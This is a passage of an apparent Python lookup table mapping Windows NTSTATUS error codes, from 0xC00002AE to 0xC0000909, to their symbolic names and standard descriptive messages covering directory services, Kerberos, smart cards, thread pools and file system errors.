0xC00002AE: ("STATUS_DS_CANT_MOD_OBJ_CLASS","The directory service detected an attempt to modify the object class of an object."), 0xC00002AF: ("STATUS_DS_CROSS_DOM_MOVE_FAILED","An error occurred while performing a cross domain move operation."), 0xC00002B0: ("STATUS_DS_GC_NOT_AVAILABLE","Unable to contact the global catalog server."), 0xC00002B1: ("STATUS_DIRECTORY_SERVICE_REQUIRED","The requested operation requires a directory service, and none was available."), 0xC00002B2: ("STATUS_REPARSE_ATTRIBUTE_CONFLICT","The reparse attribute cannot be set because it is incompatible with an existing attribute."), 0xC00002B3: ("STATUS_CANT_ENABLE_DENY_ONLY","A group marked \"use for deny only\" cannot be enabled."), 0xC00002B4: ("STATUS_FLOAT_MULTIPLE_FAULTS","{EXCEPTION} Multiple floating-point faults."), 0xC00002B5: ("STATUS_FLOAT_MULTIPLE_TRAPS","{EXCEPTION} Multiple floating-point traps."), 0xC00002B6: ("STATUS_DEVICE_REMOVED","The device has been removed."), 0xC00002B7: ("STATUS_JOURNAL_DELETE_IN_PROGRESS","The volume change journal is being deleted."), 0xC00002B8: ("STATUS_JOURNAL_NOT_ACTIVE","The volume change journal is not active."), 0xC00002B9: ("STATUS_NOINTERFACE","The requested interface is not supported."), 0xC00002C1: ("STATUS_DS_ADMIN_LIMIT_EXCEEDED","A directory service resource limit has been exceeded."), 0xC00002C2: ("STATUS_DRIVER_FAILED_SLEEP","{System Standby Failed} The driver %hs does not support standby mode. Updating this driver may allow the system to go to standby mode."), 0xC00002C3: ("STATUS_MUTUAL_AUTHENTICATION_FAILED","Mutual Authentication failed. The server password is out of date at the domain controller."), 0xC00002C4: ("STATUS_CORRUPT_SYSTEM_FILE","The system file %1 has become corrupt and has been replaced."), 0xC00002C5: ("STATUS_DATATYPE_MISALIGNMENT_ERROR","{EXCEPTION} Alignment Error A data type misalignment error was detected in a load or store instruction."), 0xC00002C6: ("STATUS_WMI_READ_ONLY","The WMI data item or data block is read-only."), 0xC00002C7: ("STATUS_WMI_SET_FAILURE","The WMI data item or data block could not be changed."), 0xC00002C8: ("STATUS_COMMITMENT_MINIMUM","{Virtual Memory Minimum Too Low} Your system is low on virtual memory. Windows is increasing the size of your virtual memory paging file. During this process, memory requests for some applications may be denied. For more information, see Help."), 0xC00002C9: ("STATUS_REG_NAT_CONSUMPTION","{EXCEPTION} Register NaT consumption faults. A NaT value is consumed on a non-speculative instruction."), 0xC00002CA: ("STATUS_TRANSPORT_FULL","The transport element of the medium changer contains media, which is causing the operation to fail."), 0xC00002CB: ("STATUS_DS_SAM_INIT_FAILURE","Security Accounts Manager initialization failed because of the following error: %hs Error Status: 0x%x. Click OK to shut down this system and restart in Directory Services Restore Mode. Check the event log for more detailed information."), 0xC00002CC: ("STATUS_ONLY_IF_CONNECTED","This operation is supported only when you are connected to the server."), 0xC00002CD: ("STATUS_DS_SENSITIVE_GROUP_VIOLATION","Only an administrator can modify the membership list of an administrative group."), 0xC00002CE: ("STATUS_PNP_RESTART_ENUMERATION","A device was removed so enumeration must be restarted."), 0xC00002CF: ("STATUS_JOURNAL_ENTRY_DELETED","The journal entry has been deleted from the journal."), 0xC00002D0: ("STATUS_DS_CANT_MOD_PRIMARYGROUPID","Cannot change the primary group ID of a domain controller account."), 0xC00002D1: ("STATUS_SYSTEM_IMAGE_BAD_SIGNATURE","{Fatal System Error} The system image %s is not properly signed. The file has been replaced with the signed file. The system has been shut down."), 0xC00002D2: ("STATUS_PNP_REBOOT_REQUIRED","The device will not start without a reboot."), 0xC00002D3: ("STATUS_POWER_STATE_INVALID","The power state of the current device cannot support this request."), 0xC00002D4: ("STATUS_DS_INVALID_GROUP_TYPE","The specified group type is invalid."), 0xC00002D5: ("STATUS_DS_NO_NEST_GLOBALGROUP_IN_MIXEDDOMAIN","In a mixed domain, no nesting of a global group if the group is security enabled."), 0xC00002D6: ("STATUS_DS_NO_NEST_LOCALGROUP_IN_MIXEDDOMAIN","In a mixed domain, cannot nest local groups with other local groups, if the group is security enabled."), 0xC00002D7: ("STATUS_DS_GLOBAL_CANT_HAVE_LOCAL_MEMBER","A global group cannot have a local group as a member."), 0xC00002D8: ("STATUS_DS_GLOBAL_CANT_HAVE_UNIVERSAL_MEMBER","A global group cannot have a universal group as a member."), 0xC00002D9: ("STATUS_DS_UNIVERSAL_CANT_HAVE_LOCAL_MEMBER","A universal group cannot have a local group as a member."), 0xC00002DA: ("STATUS_DS_GLOBAL_CANT_HAVE_CROSSDOMAIN_MEMBER","A global group cannot have a cross-domain member."), 0xC00002DB: ("STATUS_DS_LOCAL_CANT_HAVE_CROSSDOMAIN_LOCAL_MEMBER","A local group cannot have another cross-domain local group as a member."), 0xC00002DC: ("STATUS_DS_HAVE_PRIMARY_MEMBERS","Cannot change to a security-disabled group because primary members are in this group."), 0xC00002DD: ("STATUS_WMI_NOT_SUPPORTED","The WMI operation is not supported by the data block or method."), 0xC00002DE: ("STATUS_INSUFFICIENT_POWER","There is not enough power to complete the requested operation."), 0xC00002DF: ("STATUS_SAM_NEED_BOOTKEY_PASSWORD","The Security Accounts Manager needs to get the boot password."), 0xC00002E0: ("STATUS_SAM_NEED_BOOTKEY_FLOPPY","The Security Accounts Manager needs to get the boot key from the floppy disk."), 0xC00002E1: ("STATUS_DS_CANT_START","The directory service cannot start."), 0xC00002E2: ("STATUS_DS_INIT_FAILURE","The directory service could not start because of the following error: %hs Error Status: 0x%x. Click OK to shut down this system and restart in Directory Services Restore Mode. Check the event log for more detailed information."), 0xC00002E3: ("STATUS_SAM_INIT_FAILURE","The Security Accounts Manager initialization failed because of the following error: %hs Error Status: 0x%x. Click OK to shut down this system and restart in Safe Mode. Check the event log for more detailed information."), 0xC00002E4: ("STATUS_DS_GC_REQUIRED","The requested operation can be performed only on a global catalog server."), 0xC00002E5: ("STATUS_DS_LOCAL_MEMBER_OF_LOCAL_ONLY","A local group can only be a member of other local groups in the same domain."), 0xC00002E6: ("STATUS_DS_NO_FPO_IN_UNIVERSAL_GROUPS","Foreign security principals cannot be members of universal groups."), 0xC00002E7: ("STATUS_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED","Your computer could not be joined to the domain. You have exceeded the maximum number of computer accounts you are allowed to create in this domain. Contact your system administrator to have this limit reset or increased."), 0xC00002E9: ("STATUS_CURRENT_DOMAIN_NOT_ALLOWED","This operation cannot be performed on the current domain."), 0xC00002EA: ("STATUS_CANNOT_MAKE","The directory or file cannot be created."), 0xC00002EB: ("STATUS_SYSTEM_SHUTDOWN","The system is in the process of shutting down."), 0xC00002EC: ("STATUS_DS_INIT_FAILURE_CONSOLE","Directory Services could not start because of the following error: %hs Error Status: 0x%x. Click OK to shut down the system. You can use the recovery console to diagnose the system further."), 0xC00002ED: ("STATUS_DS_SAM_INIT_FAILURE_CONSOLE","Security Accounts Manager initialization failed because of the following error: %hs Error Status: 0x%x. Click OK to shut down the system. You can use the recovery console to diagnose the system further."), 0xC00002EE: ("STATUS_UNFINISHED_CONTEXT_DELETED","A security context was deleted before the context was completed. This is considered a logon failure."), 0xC00002EF: ("STATUS_NO_TGT_REPLY","The client is trying to negotiate a context and the server requires user-to-user but did not send a TGT reply."), 0xC00002F0: ("STATUS_OBJECTID_NOT_FOUND","An object ID was not found in the file."), 0xC00002F1: ("STATUS_NO_IP_ADDRESSES","Unable to accomplish the requested task because the local machine does not have any IP addresses."), 0xC00002F2: ("STATUS_WRONG_CREDENTIAL_HANDLE","The supplied credential handle does not match the credential that is associated with the security context."), 0xC00002F3: ("STATUS_CRYPTO_SYSTEM_INVALID","The crypto system or checksum function is invalid because a required function is unavailable."), 0xC00002F4: ("STATUS_MAX_REFERRALS_EXCEEDED","The number of maximum ticket referrals has been exceeded."), 0xC00002F5: ("STATUS_MUST_BE_KDC","The local machine must be a Kerberos KDC (domain controller) and it is not."), 0xC00002F6: ("STATUS_STRONG_CRYPTO_NOT_SUPPORTED","The other end of the security negotiation requires strong crypto but it is not supported on the local machine."), 0xC00002F7: ("STATUS_TOO_MANY_PRINCIPALS","The KDC reply contained more than one principal name."), 0xC00002F8: ("STATUS_NO_PA_DATA","Expected to find PA data for a hint of what etype to use, but it was not found."), 0xC00002F9: ("STATUS_PKINIT_NAME_MISMATCH","The client certificate does not contain a valid UPN, or does not match the client name in the logon request. Contact your administrator."), 0xC00002FA: ("STATUS_SMARTCARD_LOGON_REQUIRED","Smart card logon is required and was not used."), 0xC00002FB: ("STATUS_KDC_INVALID_REQUEST","An invalid request was sent to the KDC."), 0xC00002FC: ("STATUS_KDC_UNABLE_TO_REFER","The KDC was unable to generate a referral for the service requested."), 0xC00002FD: ("STATUS_KDC_UNKNOWN_ETYPE","The encryption type requested is not supported by the KDC."), 0xC00002FE: ("STATUS_SHUTDOWN_IN_PROGRESS","A system shutdown is in progress."), 0xC00002FF: ("STATUS_SERVER_SHUTDOWN_IN_PROGRESS","The server machine is shutting down."), 0xC0000300: ("STATUS_NOT_SUPPORTED_ON_SBS","This operation is not supported on a computer running Windows Server 2003 for Small Business Server."), 0xC0000301: ("STATUS_WMI_GUID_DISCONNECTED","The WMI GUID is no longer available."), 0xC0000302: ("STATUS_WMI_ALREADY_DISABLED","Collection or events for the WMI GUID is already disabled."), 0xC0000303: ("STATUS_WMI_ALREADY_ENABLED","Collection or events for the WMI GUID is already enabled."), 0xC0000304: ("STATUS_MFT_TOO_FRAGMENTED","The master file table on the volume is too fragmented to complete this operation."), 0xC0000305: ("STATUS_COPY_PROTECTION_FAILURE","Copy protection failure."), 0xC0000306: ("STATUS_CSS_AUTHENTICATION_FAILURE","Copy protection error-DVD CSS Authentication failed."), 0xC0000307: ("STATUS_CSS_KEY_NOT_PRESENT","Copy protection error-The specified sector does not contain a valid key."), 0xC0000308: ("STATUS_CSS_KEY_NOT_ESTABLISHED","Copy protection error-DVD session key not established."), 0xC0000309: ("STATUS_CSS_SCRAMBLED_SECTOR","Copy protection error-The read failed because the sector is encrypted."), 0xC000030A: ("STATUS_CSS_REGION_MISMATCH","Copy protection error-The region of the specified DVD does not correspond to the region setting of the drive."), 0xC000030B: ("STATUS_CSS_RESETS_EXHAUSTED","Copy protection error-The region setting of the drive may be permanent."), 0xC0000320: ("STATUS_PKINIT_FAILURE","The Kerberos protocol encountered an error while validating the KDC certificate during smart card logon. There is more information in the system event log."), 0xC0000321: ("STATUS_SMARTCARD_SUBSYSTEM_FAILURE","The Kerberos protocol encountered an error while attempting to use the smart card subsystem."), 0xC0000322: ("STATUS_NO_KERB_KEY","The target server does not have acceptable Kerberos credentials."), 0xC0000350: ("STATUS_HOST_DOWN","The transport determined that the remote system is down."), 0xC0000351: ("STATUS_UNSUPPORTED_PREAUTH","An unsupported pre-authentication mechanism was presented to the Kerberos package."), 0xC0000352: ("STATUS_EFS_ALG_BLOB_TOO_BIG","The encryption algorithm that is used on the source file needs a bigger key buffer than the one that is used on the destination file."), 0xC0000353: ("STATUS_PORT_NOT_SET","An attempt to remove a processes DebugPort was made, but a port was not already associated with the process."), 0xC0000354: ("STATUS_DEBUGGER_INACTIVE","An attempt to do an operation on a debug port failed because the port is in the process of being deleted."), 0xC0000355: ("STATUS_DS_VERSION_CHECK_FAILURE","This version of Windows is not compatible with the behavior version of the directory forest, domain, or domain controller."), 0xC0000356: ("STATUS_AUDITING_DISABLED","The specified event is currently not being audited."), 0xC0000357: ("STATUS_PRENT4_MACHINE_ACCOUNT","The machine account was created prior to Windows NT 4.0. The account needs to be recreated."), 0xC0000358: ("STATUS_DS_AG_CANT_HAVE_UNIVERSAL_MEMBER","An account group cannot have a universal group as a member."), 0xC0000359: ("STATUS_INVALID_IMAGE_WIN_32","The specified image file did not have the correct format; it appears to be a 32-bit Windows image."), 0xC000035A: ("STATUS_INVALID_IMAGE_WIN_64","The specified image file did not have the correct format; it appears to be a 64-bit Windows image."), 0xC000035B: ("STATUS_BAD_BINDINGS","The client's supplied SSPI channel bindings were incorrect."), 0xC000035C: ("STATUS_NETWORK_SESSION_EXPIRED","The client session has expired; so the client must re-authenticate to continue accessing the remote resources."), 0xC000035D: ("STATUS_APPHELP_BLOCK","The AppHelp dialog box canceled; thus preventing the application from starting."), 0xC000035E: ("STATUS_ALL_SIDS_FILTERED","The SID filtering operation removed all SIDs."), 0xC000035F: ("STATUS_NOT_SAFE_MODE_DRIVER","The driver was not loaded because the system is starting in safe mode."), 0xC0000361: ("STATUS_ACCESS_DISABLED_BY_POLICY_DEFAULT","Access to %1 has been restricted by your Administrator by the default software restriction policy level."), 0xC0000362: ("STATUS_ACCESS_DISABLED_BY_POLICY_PATH","Access to %1 has been restricted by your Administrator by location with policy rule %2 placed on path %3."), 0xC0000363: ("STATUS_ACCESS_DISABLED_BY_POLICY_PUBLISHER","Access to %1 has been restricted by your Administrator by software publisher policy."), 0xC0000364: ("STATUS_ACCESS_DISABLED_BY_POLICY_OTHER","Access to %1 has been restricted by your Administrator by policy rule %2."), 0xC0000365: ("STATUS_FAILED_DRIVER_ENTRY","The driver was not loaded because it failed its initialization call."), 0xC0000366: ("STATUS_DEVICE_ENUMERATION_ERROR","The device encountered an error while applying power or reading the device configuration. This may be caused by a failure of your hardware or by a poor connection."), 0xC0000368: ("STATUS_MOUNT_POINT_NOT_RESOLVED","The create operation failed because the name contained at least one mount point that resolves to a volume to which the specified device object is not attached."), 0xC0000369: ("STATUS_INVALID_DEVICE_OBJECT_PARAMETER","The device object parameter is either not a valid device object or is not attached to the volume that is specified by the file name."), 0xC000036A: ("STATUS_MCA_OCCURED","A machine check error has occurred. Check the system event log for additional information."), 0xC000036B: ("STATUS_DRIVER_BLOCKED_CRITICAL","Driver %2 has been blocked from loading."), 0xC000036C: ("STATUS_DRIVER_BLOCKED","Driver %2 has been blocked from loading."), 0xC000036D: ("STATUS_DRIVER_DATABASE_ERROR","There was error [%2] processing the driver database."), 0xC000036E: ("STATUS_SYSTEM_HIVE_TOO_LARGE","System hive size has exceeded its limit."), 0xC000036F: ("STATUS_INVALID_IMPORT_OF_NON_DLL","A dynamic link library (DLL) referenced a module that was neither a DLL nor the process's executable image."), 0xC0000371: ("STATUS_NO_SECRETS","The local account store does not contain secret material for the specified account."), 0xC0000372: ("STATUS_ACCESS_DISABLED_NO_SAFER_UI_BY_POLICY","Access to %1 has been restricted by your Administrator by policy rule %2."), 0xC0000373: ("STATUS_FAILED_STACK_SWITCH","The system was not able to allocate enough memory to perform a stack switch."), 0xC0000374: ("STATUS_HEAP_CORRUPTION","A heap has been corrupted."), 0xC0000380: ("STATUS_SMARTCARD_WRONG_PIN","An incorrect PIN was presented to the smart card."), 0xC0000381: ("STATUS_SMARTCARD_CARD_BLOCKED","The smart card is blocked."), 0xC0000382: ("STATUS_SMARTCARD_CARD_NOT_AUTHENTICATED","No PIN was presented to the smart card."), 0xC0000383: ("STATUS_SMARTCARD_NO_CARD","No smart card is available."), 0xC0000384: ("STATUS_SMARTCARD_NO_KEY_CONTAINER","The requested key container does not exist on the smart card."), 0xC0000385: ("STATUS_SMARTCARD_NO_CERTIFICATE","The requested certificate does not exist on the smart card."), 0xC0000386: ("STATUS_SMARTCARD_NO_KEYSET","The requested keyset does not exist."), 0xC0000387: ("STATUS_SMARTCARD_IO_ERROR","A communication error with the smart card has been detected."), 0xC0000388: ("STATUS_DOWNGRADE_DETECTED","The system detected a possible attempt to compromise security. Ensure that you can contact the server that authenticated you."), 0xC0000389: ("STATUS_SMARTCARD_CERT_REVOKED","The smart card certificate used for authentication has been revoked. Contact your system administrator. There may be additional information in the event log."), 0xC000038A: ("STATUS_ISSUING_CA_UNTRUSTED","An untrusted certificate authority was detected while processing the smart card certificate that is used for authentication. Contact your system administrator."), 0xC000038B: ("STATUS_REVOCATION_OFFLINE_C","The revocation status of the smart card certificate that is used for authentication could not be determined. Contact your system administrator."), 0xC000038C: ("STATUS_PKINIT_CLIENT_FAILURE","The smart card certificate used for authentication was not trusted. Contact your system administrator."), 0xC000038D: ("STATUS_SMARTCARD_CERT_EXPIRED","The smart card certificate used for authentication has expired. Contact your system administrator."), 0xC000038E: ("STATUS_DRIVER_FAILED_PRIOR_UNLOAD","The driver could not be loaded because a previous version of the driver is still in memory."), 0xC000038F: ("STATUS_SMARTCARD_SILENT_CONTEXT","The smart card provider could not perform the action because the context was acquired as silent."), 0xC0000401: ("STATUS_PER_USER_TRUST_QUOTA_EXCEEDED","The delegated trust creation quota of the current user has been exceeded."), 0xC0000402: ("STATUS_ALL_USER_TRUST_QUOTA_EXCEEDED","The total delegated trust creation quota has been exceeded."), 0xC0000403: ("STATUS_USER_DELETE_TRUST_QUOTA_EXCEEDED","The delegated trust deletion quota of the current user has been exceeded."), 0xC0000404: ("STATUS_DS_NAME_NOT_UNIQUE","The requested name already exists as a unique identifier."), 0xC0000405: ("STATUS_DS_DUPLICATE_ID_FOUND","The requested object has a non-unique identifier and cannot be retrieved."), 0xC0000406: ("STATUS_DS_GROUP_CONVERSION_ERROR","The group cannot be converted due to attribute restrictions on the requested group type."), 0xC0000407: ("STATUS_VOLSNAP_PREPARE_HIBERNATE","{Volume Shadow Copy Service} Wait while the Volume Shadow Copy Service prepares volume %hs for hibernation."), 0xC0000408: ("STATUS_USER2USER_REQUIRED","Kerberos sub-protocol User2User is required."), 0xC0000409: ("STATUS_STACK_BUFFER_OVERRUN","The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application."), 0xC000040A: ("STATUS_NO_S4U_PROT_SUPPORT","The Kerberos subsystem encountered an error. A service for user protocol request was made against a domain controller which does not support service for user."), 0xC000040B: ("STATUS_CROSSREALM_DELEGATION_FAILURE","An attempt was made by this server to make a Kerberos constrained delegation request for a target that is outside the server realm. This action is not supported and the resulting error indicates a misconfiguration on the allowed-to-delegate-to list for this server. Contact your administrator."), 0xC000040C: ("STATUS_REVOCATION_OFFLINE_KDC","The revocation status of the domain controller certificate used for smart card authentication could not be determined. There is additional information in the system event log. Contact your system administrator."), 0xC000040D: ("STATUS_ISSUING_CA_UNTRUSTED_KDC","An untrusted certificate authority was detected while processing the domain controller certificate used for authentication. There is additional information in the system event log. Contact your system administrator."), 0xC000040E: ("STATUS_KDC_CERT_EXPIRED","The domain controller certificate used for smart card logon has expired. Contact your system administrator with the contents of your system event log."), 0xC000040F: ("STATUS_KDC_CERT_REVOKED","The domain controller certificate used for smart card logon has been revoked. Contact your system administrator with the contents of your system event log."), 0xC0000410: ("STATUS_PARAMETER_QUOTA_EXCEEDED","Data present in one of the parameters is more than the function can operate on."), 0xC0000411: ("STATUS_HIBERNATION_FAILURE","The system has failed to hibernate (The error code is %hs). Hibernation will be disabled until the system is restarted."), 0xC0000412: ("STATUS_DELAY_LOAD_FAILED","An attempt to delay-load a .dll or get a function address in a delay-loaded .dll failed."), 0xC0000413: ("STATUS_AUTHENTICATION_FIREWALL_FAILED","Logon Failure: The machine you are logging onto is protected by an authentication firewall. The specified account is not allowed to authenticate to the machine."), 0xC0000414: ("STATUS_VDM_DISALLOWED","%hs is a 16-bit application. You do not have permissions to execute 16-bit applications. Check your permissions with your system administrator."), 0xC0000415: ("STATUS_HUNG_DISPLAY_DRIVER_THREAD","{Display Driver Stopped Responding} The %hs display driver has stopped working normally. Save your work and reboot the system to restore full display functionality. The next time you reboot the machine a dialog will be displayed giving you a chance to report this failure to Microsoft."), 0xC0000416: ("STATUS_INSUFFICIENT_RESOURCE_FOR_SPECIFIED_SHARED_SECTION_SIZE","The Desktop heap encountered an error while allocating session memory. There is more information in the system event log."), 0xC0000417: ("STATUS_INVALID_CRUNTIME_PARAMETER","An invalid parameter was passed to a C runtime function."), 0xC0000418: ("STATUS_NTLM_BLOCKED","The authentication failed because NTLM was blocked."), 0xC0000419: ("STATUS_DS_SRC_SID_EXISTS_IN_FOREST","The source object's SID already exists in destination forest."), 0xC000041A: ("STATUS_DS_DOMAIN_NAME_EXISTS_IN_FOREST","The domain name of the trusted domain already exists in the forest."), 0xC000041B: ("STATUS_DS_FLAT_NAME_EXISTS_IN_FOREST","The flat name of the trusted domain already exists in the forest."), 0xC000041C: ("STATUS_INVALID_USER_PRINCIPAL_NAME","The User Principal Name (UPN) is invalid."), 0xC0000420: ("STATUS_ASSERTION_FAILURE","There has been an assertion failure."), 0xC0000421: ("STATUS_VERIFIER_STOP","Application verifier has found an error in the current process."), 0xC0000423: ("STATUS_CALLBACK_POP_STACK","A user mode unwind is in progress."), 0xC0000424: ("STATUS_INCOMPATIBLE_DRIVER_BLOCKED","%2 has been blocked from loading due to incompatibility with this system. Contact your software vendor for a compatible version of the driver."), 0xC0000425: ("STATUS_HIVE_UNLOADED","Illegal operation attempted on a registry key which has already been unloaded."), 0xC0000426: ("STATUS_COMPRESSION_DISABLED","Compression is disabled for this volume."), 0xC0000427: ("STATUS_FILE_SYSTEM_LIMITATION","The requested operation could not be completed due to a file system limitation."), 0xC0000428: ("STATUS_INVALID_IMAGE_HASH","The hash for image %hs cannot be found in the system catalogs. The image is likely corrupt or the victim of tampering."), 0xC0000429: ("STATUS_NOT_CAPABLE","The implementation is not capable of performing the request."), 0xC000042A: ("STATUS_REQUEST_OUT_OF_SEQUENCE","The requested operation is out of order with respect to other operations."), 0xC000042B: ("STATUS_IMPLEMENTATION_LIMIT","An operation attempted to exceed an implementation-defined limit."), 0xC000042C: ("STATUS_ELEVATION_REQUIRED","The requested operation requires elevation."), 0xC000042D: ("STATUS_NO_SECURITY_CONTEXT","The required security context does not exist."), 0xC000042E: ("STATUS_PKU2U_CERT_FAILURE","The PKU2U protocol encountered an error while attempting to utilize the associated certificates."), 0xC0000432: ("STATUS_BEYOND_VDL","The operation was attempted beyond the valid data length of the file."), 0xC0000433: ("STATUS_ENCOUNTERED_WRITE_IN_PROGRESS","The attempted write operation encountered a write already in progress for some portion of the range."), 0xC0000434: ("STATUS_PTE_CHANGED","The page fault mappings changed in the middle of processing a fault so the operation must be retried."), 0xC0000435: ("STATUS_PURGE_FAILED","The attempt to purge this file from memory failed to purge some or all the data from memory."), 0xC0000440: ("STATUS_CRED_REQUIRES_CONFIRMATION","The requested credential requires confirmation."), 0xC0000441: ("STATUS_CS_ENCRYPTION_INVALID_SERVER_RESPONSE","The remote server sent an invalid response for a file being opened with Client Side Encryption."), 0xC0000442: ("STATUS_CS_ENCRYPTION_UNSUPPORTED_SERVER","Client Side Encryption is not supported by the remote server even though it claims to support it."), 0xC0000443: ("STATUS_CS_ENCRYPTION_EXISTING_ENCRYPTED_FILE","File is encrypted and should be opened in Client Side Encryption mode."), 0xC0000444: ("STATUS_CS_ENCRYPTION_NEW_ENCRYPTED_FILE","A new encrypted file is being created and a $EFS needs to be provided."), 0xC0000445: ("STATUS_CS_ENCRYPTION_FILE_NOT_CSE","The SMB client requested a CSE FSCTL on a non-CSE file."), 0xC0000446: ("STATUS_INVALID_LABEL","Indicates a particular Security ID may not be assigned as the label of an object."), 0xC0000450: ("STATUS_DRIVER_PROCESS_TERMINATED","The process hosting the driver for this device has terminated."), 0xC0000451: ("STATUS_AMBIGUOUS_SYSTEM_DEVICE","The requested system device cannot be identified due to multiple indistinguishable devices potentially matching the identification criteria."), 0xC0000452: ("STATUS_SYSTEM_DEVICE_NOT_FOUND","The requested system device cannot be found."), 0xC0000453: ("STATUS_RESTART_BOOT_APPLICATION","This boot application must be restarted."), 0xC0000454: ("STATUS_INSUFFICIENT_NVRAM_RESOURCES","Insufficient NVRAM resources exist to complete the API. A reboot might be required."), 0xC0000500: ("STATUS_INVALID_TASK_NAME","The specified task name is invalid."), 0xC0000501: ("STATUS_INVALID_TASK_INDEX","The specified task index is invalid."), 0xC0000502: ("STATUS_THREAD_ALREADY_IN_TASK","The specified thread is already joining a task."), 0xC0000503: ("STATUS_CALLBACK_BYPASS","A callback has requested to bypass native code."), 0xC0000602: ("STATUS_FAIL_FAST_EXCEPTION","A fail fast exception occurred. Exception handlers will not be invoked and the process will be terminated immediately."), 0xC0000603: ("STATUS_IMAGE_CERT_REVOKED","Windows cannot verify the digital signature for this file. The signing certificate for this file has been revoked."), 0xC0000700: ("STATUS_PORT_CLOSED","The ALPC port is closed."), 0xC0000701: ("STATUS_MESSAGE_LOST","The ALPC message requested is no longer available."), 0xC0000702: ("STATUS_INVALID_MESSAGE","The ALPC message supplied is invalid."), 0xC0000703: ("STATUS_REQUEST_CANCELED","The ALPC message has been canceled."), 0xC0000704: ("STATUS_RECURSIVE_DISPATCH","Invalid recursive dispatch attempt."), 0xC0000705: ("STATUS_LPC_RECEIVE_BUFFER_EXPECTED","No receive buffer has been supplied in a synchronous request."), 0xC0000706: ("STATUS_LPC_INVALID_CONNECTION_USAGE","The connection port is used in an invalid context."), 0xC0000707: ("STATUS_LPC_REQUESTS_NOT_ALLOWED","The ALPC port does not accept new request messages."), 0xC0000708: ("STATUS_RESOURCE_IN_USE","The resource requested is already in use."), 0xC0000709: ("STATUS_HARDWARE_MEMORY_ERROR","The hardware has reported an uncorrectable memory error."), 0xC000070A: ("STATUS_THREADPOOL_HANDLE_EXCEPTION","Status 0x%08x was returned, waiting on handle 0x%x for wait 0x%p, in waiter 0x%p."), 0xC000070B: ("STATUS_THREADPOOL_SET_EVENT_ON_COMPLETION_FAILED","After a callback to 0x%p(0x%p), a completion call to Set event(0x%p) failed with status 0x%08x."), 0xC000070C: ("STATUS_THREADPOOL_RELEASE_SEMAPHORE_ON_COMPLETION_FAILED","After a callback to 0x%p(0x%p), a completion call to ReleaseSemaphore(0x%p, %d) failed with status 0x%08x."), 0xC000070D: ("STATUS_THREADPOOL_RELEASE_MUTEX_ON_COMPLETION_FAILED","After a callback to 0x%p(0x%p), a completion call to ReleaseMutex(%p) failed with status 0x%08x."), 0xC000070E: ("STATUS_THREADPOOL_FREE_LIBRARY_ON_COMPLETION_FAILED","After a callback to 0x%p(0x%p), a completion call to FreeLibrary(%p) failed with status 0x%08x."), 0xC000070F: ("STATUS_THREADPOOL_RELEASED_DURING_OPERATION","The thread pool 0x%p was released while a thread was posting a callback to 0x%p(0x%p) to it."), 0xC0000710: ("STATUS_CALLBACK_RETURNED_WHILE_IMPERSONATING","A thread pool worker thread is impersonating a client, after a callback to 0x%p(0x%p). This is unexpected, indicating that the callback is missing a call to revert the impersonation."), 0xC0000711: ("STATUS_APC_RETURNED_WHILE_IMPERSONATING","A thread pool worker thread is impersonating a client, after executing an APC. This is unexpected, indicating that the APC is missing a call to revert the impersonation."), 0xC0000712: ("STATUS_PROCESS_IS_PROTECTED","Either the target process, or the target thread's containing process, is a protected process."), 0xC0000713: ("STATUS_MCA_EXCEPTION","A thread is getting dispatched with MCA EXCEPTION because of MCA."), 0xC0000714: ("STATUS_CERTIFICATE_MAPPING_NOT_UNIQUE","The client certificate account mapping is not unique."), 0xC0000715: ("STATUS_SYMLINK_CLASS_DISABLED","The symbolic link cannot be followed because its type is disabled."), 0xC0000716: ("STATUS_INVALID_IDN_NORMALIZATION","Indicates that the specified string is not valid for IDN normalization."), 0xC0000717: ("STATUS_NO_UNICODE_TRANSLATION","No mapping for the Unicode character exists in the target multi-byte code page."), 0xC0000718: ("STATUS_ALREADY_REGISTERED","The provided callback is already registered."), 0xC0000719: ("STATUS_CONTEXT_MISMATCH","The provided context did not match the target."), 0xC000071A: ("STATUS_PORT_ALREADY_HAS_COMPLETION_LIST","The specified port already has a completion list."), 0xC000071B: ("STATUS_CALLBACK_RETURNED_THREAD_PRIORITY","A threadpool worker thread entered a callback at thread base priority 0x%x and exited at priority 0x%x. This is unexpected, indicating that the callback missed restoring the priority."), 0xC000071C: ("STATUS_INVALID_THREAD","An invalid thread, handle %p, is specified for this operation. Possibly, a threadpool worker thread was specified."), 0xC000071D: ("STATUS_CALLBACK_RETURNED_TRANSACTION","A threadpool worker thread entered a callback, which left transaction state. This is unexpected, indicating that the callback missed clearing the transaction."), 0xC000071E: ("STATUS_CALLBACK_RETURNED_LDR_LOCK","A threadpool worker thread entered a callback, which left the loader lock held. This is unexpected, indicating that the callback missed releasing the lock."), 0xC000071F: ("STATUS_CALLBACK_RETURNED_LANG","A threadpool worker thread entered a callback, which left with preferred languages set. This is unexpected, indicating that the callback missed clearing them."), 0xC0000720: ("STATUS_CALLBACK_RETURNED_PRI_BACK","A threadpool worker thread entered a callback, which left with background priorities set. This is unexpected, indicating that the callback missed restoring the original priorities."), 0xC0000800: ("STATUS_DISK_REPAIR_DISABLED","The attempted operation required self healing to be enabled."), 0xC0000801: ("STATUS_DS_DOMAIN_RENAME_IN_PROGRESS","The directory service cannot perform the requested operation because a domain rename operation is in progress."), 0xC0000802: ("STATUS_DISK_QUOTA_EXCEEDED","An operation failed because the storage quota was exceeded."), 0xC0000804: ("STATUS_CONTENT_BLOCKED","An operation failed because the content was blocked."), 0xC0000805: ("STATUS_BAD_CLUSTERS","The operation could not be completed due to bad clusters on disk."), 0xC0000806: ("STATUS_VOLUME_DIRTY","The operation could not be completed because the volume is dirty. Please run the Chkdsk utility and try again."), 0xC0000901: ("STATUS_FILE_CHECKED_OUT","This file is checked out or locked for editing by another user."), 0xC0000902: ("STATUS_CHECKOUT_REQUIRED","The file must be checked out before saving changes."), 0xC0000903: ("STATUS_BAD_FILE_TYPE","The file type being saved or retrieved has been blocked."), 0xC0000904: ("STATUS_FILE_TOO_LARGE","The file size exceeds the limit allowed and cannot be saved."), 0xC0000905: ("STATUS_FORMS_AUTH_REQUIRED","Access Denied. Before opening files in this location, you must first browse to the e.g. site and select the option to log on automatically."), 0xC0000906: ("STATUS_VIRUS_INFECTED","The operation did not complete successfully because the file contains a virus."), 0xC0000907: ("STATUS_VIRUS_DELETED","This file contains a virus and cannot be opened. Due to the nature of this virus, the file has been removed from this location."), 0xC0000908: ("STATUS_BAD_MCFG_TABLE","The resources required for this device conflict with the MCFG table."), 0xC0000909: 